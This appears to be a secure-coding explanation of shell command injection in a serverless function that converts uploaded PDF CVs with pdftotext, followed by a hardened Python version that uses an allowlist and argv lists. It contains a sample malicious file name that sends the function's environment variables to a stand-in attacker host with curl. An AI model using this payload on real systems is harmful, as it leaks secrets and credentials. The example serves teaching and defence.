In this example of a job candidate CV filtering system, a transformation converts the PDF file into text in order to perform text analytics. The transformation of the PDF file into text is done using a command line utility (pdftotext).
The developer of this serverless function assumes that users will provide legitimate PDF file names and does not perform any kind of sanity check on the incoming file name, except for a rudimentary check that the file's extension is indeed .pdf. The file name is embedded directly into the shell command, and this weakness allows a malicious user to inject shell commands as part of the PDF file name.
For example, the following PDF file name will leak all environment variables of the currently executing function:
foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
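The hardened version of the conversion step, as an added example that is not the code of the function described above: the file name is checked against a strict allowlist and pdftotext is invoked with an argument list rather than through a shell, so the injected name above is rejected before any command runs. The regex, the upload directory and the function names are assumptions for illustration.

```python
import os
import re
import shutil
import subprocess
from typing import List

# Hypothetical allowlist: a plain base name of safe characters ending in .pdf.
# Shell metacharacters (; | & $ ` quotes), whitespace and path separators
# never match, so they are refused long before a command is built.
SAFE_PDF_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.pdf$")
UPLOAD_DIR = "/tmp/uploads"  # hypothetical location of the uploaded CVs


def validate_pdf_name(name: str) -> bool:
    """Accept only a bare file name that matches the allowlist."""
    if name != os.path.basename(name):  # reject any directory component
        return False
    return SAFE_PDF_NAME.fullmatch(name) is not None


def build_pdftotext_argv(name: str) -> List[str]:
    """Build the pdftotext command as an argv list; no shell is involved.

    The vulnerable pattern described above is the string form
    ("pdftotext " + name + " -") passed to a shell, where the file name is
    interpreted as shell syntax. In an argv list the name is a single
    opaque argument whatever characters it contains.
    """
    if not validate_pdf_name(name):
        raise ValueError("rejected PDF file name")
    # "-" tells pdftotext to write the extracted text to stdout
    return ["pdftotext", os.path.join(UPLOAD_DIR, name), "-"]


def pdf_to_text(name: str) -> str:
    """Run the conversion with shell=False (subprocess.run's default)."""
    argv = build_pdftotext_argv(name)
    if shutil.which(argv[0]) is None:
        raise RuntimeError("pdftotext is not installed")
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout
```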